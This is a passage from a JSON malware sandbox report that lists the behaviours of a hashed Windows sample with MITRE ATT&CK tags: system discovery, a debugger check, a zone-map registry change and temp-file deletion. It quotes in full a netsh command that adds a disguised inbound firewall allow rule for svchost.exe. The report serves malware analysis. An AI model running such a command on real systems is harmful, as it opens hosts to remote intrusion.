at 00000000-00002528-00000105-414401 [PID: 2528]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EB70000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EB70000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EB70000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00002528-00000105-1976042", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" queries volume information of \"C:\\\" at 00000000-00005548-0000010C-1207884\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" queries volume information of \"C:\\\" at 00000000-00005548-0000010C-1209104\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00001512-0000010C-1587144\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00001512-0000010C-1588594\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-39971\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-2124142\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-3386213\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-3388626", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c867743798e75ffffffff0c0000004c6286771f798e75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088ea4a77ecf91200b344e16b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000893be82ebcf51200616b400088000000f822410081a84a77ecf912000000900100febd0000020000080000001cc95e00 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebf176181d38000080fd7f9a5c887700e0fd7fb0c96e014480fd7f00000000400000003f000000250000000080fd7fa4c96e01c15c887760828f77250000000080fd7f9a5c887700e0fd7fc8c96e015789877780838f7713178f75d8ebf176 (UID: 00000000-00005548)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060762300a8fb5100145c8777435c877774fc510001000000940121000100000028fb5100935c887740838f77d4a087771d549c7774fc51000100000001000000e0bf230000000000f8fa510028fb510094fb510095e18377cdab4a00feffffffd4a087771bbe8e750000c87600000000 (UID: 00000000-00002472)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000040ad3b008cf76000145c8777435c877758f860000100000094013900010000000cf76000935c887740838f77d4a087774543ad7758f860000100000001000000e8df3b0000000000dcf660000cf7600078f7600095e18377b1b04a00feffffffd4a087771bbe8e750000c87600000000 (UID: 00000000-00002820)\n \"ctbzjelz.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc30003cfc2400145c8777435c877708fd24000100000094012e0001000000bcfb2400935c887740838f77d4a08777d343e97708fd2400010000000100000070e03000000000008cfb2400bcfb240028fc240095e1837797bc4a00feffffffd4a087771bbe8e750000c87600000000 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c867743798e75ffffffff0c0000004c6286771f798e75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00001512)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005904)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" queries volume information of \"C:\\\" at 00000000-00005548-0000010C-1207884\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" queries volume information of \"C:\\\" at 00000000-00005548-0000010C-1209104\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00001512-0000010C-1587144\n \"ctbzjelz.exe\" queries volume information of \"C:\\\" at 00000000-00001512-0000010C-1588594\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-39971\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-2124142\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-3386213\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003044-0000010C-3388626", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e5f00fce2120080f4e37600005f000000000089f4e37631bbe92e0200000070e312006ce3120064e2120068e2120018e4120095e1837770614900c0e21200c83aed7634e31200d58ce57670e3120004e3120042a4e376a802ed7644e31200d2f4e376080000006ef5e37644f5e37689bae92e0200000070aab76e0000130026bbb76e18e31200020000000000130070aab76e48e3120042a4e376a802ed768ce3120010a9b76e08000000e6a8b76e56d8b7280200000070aab76e0000130026bbb76eac0e5f00780e5f0058e312008050c36e18e41200f9f2bb6e32931246 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000f97ef5040300000044e56e01692a942ff81700008ce56e01c0e46e01590000000300000048e46e0150e46e0118e66e0150b8e26bcd411e45feffffff98e56e016fe4e16bf97ef50498e56e017ce4e16b060000000000a86a010000008fe4e16b3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56e01000000008e00000044e66e01feffffffcce56e01cf008877d6008877ac98a0768e0000004700000044e66e0100000000a0e56e010000000008e66e01 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ff5a962944de6e016d82fe753c61380004010000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000650033006400330063003300320033003300610063006200300035003400300063003700320034003900320033003000310064003300660063003300360030006400360061006100370063003400370065003100300033003700630064003200630032002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b877790b5a076d8ebf176ac0130000000300000000000000000000300ed00c2000000000000000000000000000000000000000400e800c200000000000000000000000870300000000000200000000000000000000000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003000b0c33a00000000003e00003e340000c0d8c53a0050dd3a00b0623800f00100000000300004000000b0c33a00acee6e010464877738013000e0638777cc93a0760000000000003000b8c33a006dd14a77cb16942f6cae6d770000000000000000e801000050dd3a00d82f30000100000000003000500130000c000000b8c33a00d82f3000020000021800000053220071820000000000000000000000030000004cee6e01820000007f070000000000005322007102000000c075527750dd3a0000000000c075527768ee6e01e830300000000000d82f3000c0ee6e01ff2b8777 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000708717830300000044e56e01692a942f240600008ce56e01c0e46e015b0000000300000048e46e0150e46e0118e66e0150b8e26bcd411e45feffffff98e56e016fe4e16b7087178398e56e017ce4e16b820500000000a86a010000008fe4e16b3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300088ed3a00000000003e00003e340000c0b0ef3a0078e9370028f33a00f0010000000030000400000088ed3a00acee6e010464877738013000e0638777cc93a076000000000000300090ed3a006dd14a77cb16942f6cae6d770000000000000000fc00000078e93700d82f30000100000000003000500130000c00000090ed3a00d82f300002000002180000000d03000e820000000000000000000000030000004cee6e01820000008d020000000000000320002302000000c075527720383b0000000000c075527768ee6e014c30300000000000d82f3000c0ee6e01ff2b8777 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000660228dd0300000044e56e01692a942f200c00008ce56e01c0e46e015b0000000300000048e46e0150e46e0118e66e0150b8e26bcd411e45feffffff98e56e016fe4e16b660228dd98e56e017ce4e16b820500000000a86a010000008fe4e16b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"IsWow64Process\" with parameter \"5548\" - (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"ctbzjelz.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002528)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002528)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005548)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00005904)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000ea9673ce613000000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000cd2db767a933b7670000000000000000\" - (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"3b61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2291604\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ctbzjelz.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ctbzjelz.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002528)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002528)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"ctbzjelz.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\AWEOVPRV\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, 